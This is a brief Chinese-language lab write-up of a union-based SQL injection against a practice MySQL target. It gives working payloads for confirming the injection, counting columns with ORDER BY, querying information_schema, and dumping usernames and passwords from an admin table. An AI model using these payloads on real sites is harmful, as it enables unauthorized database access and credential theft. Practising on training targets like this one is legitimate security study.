打開靶機
右鍵源代碼 習慣搜一下index 發現php 大概率為MYSQL數據庫
點擊index.php后發現新建一個網頁和之前的一樣 結論這個index.php就是靶機
判斷是否存在注入點
發現url上有id=1 又是MYSQL數據庫 心中竊喜 就可以想到select * from [表] where id=[任何數字]
接下來把id=后改成0+1 看看有沒有發現
果然有戲 發現跟原來界面相同 說明0+1被帶到數據庫中執行所以說存在注入點 接下來我們可以干活了
我們開始猜字段 當然用order by 在id=1后加上and 1=1 order by 1
發現頁面沒有異常 我們繼續猜and 1=1 order by 2
頁面也沒有異常 繼續猜and 1=1 order by 3 這里大家可以寫一個小腳本自己跑
頁面沒有了 說明沒有3字段 只有2個字段 那我們就select一下
查詢系統自帶庫以獲取表名、字段名
MySQL 在 5 以上的版本都自帶了一個數據庫,叫 information_schema
通過構造 ?id=1 and 0 union select 1,version() 來判斷是否有 information_schema
發現是5以上的版本 說明有 我們在用?id=1 and 0 union select 1,database() 再看看數據庫有什么發現
發現庫名叫maoshe
獲取表名,利用 庫名 去 information_schema 查找 表名即可。
發現
發現 id username password
用?id=1 and 0 union select 1,GROUP_CONCAT(id, username, password) from admin limit 0,1提取出id username password
結束!!!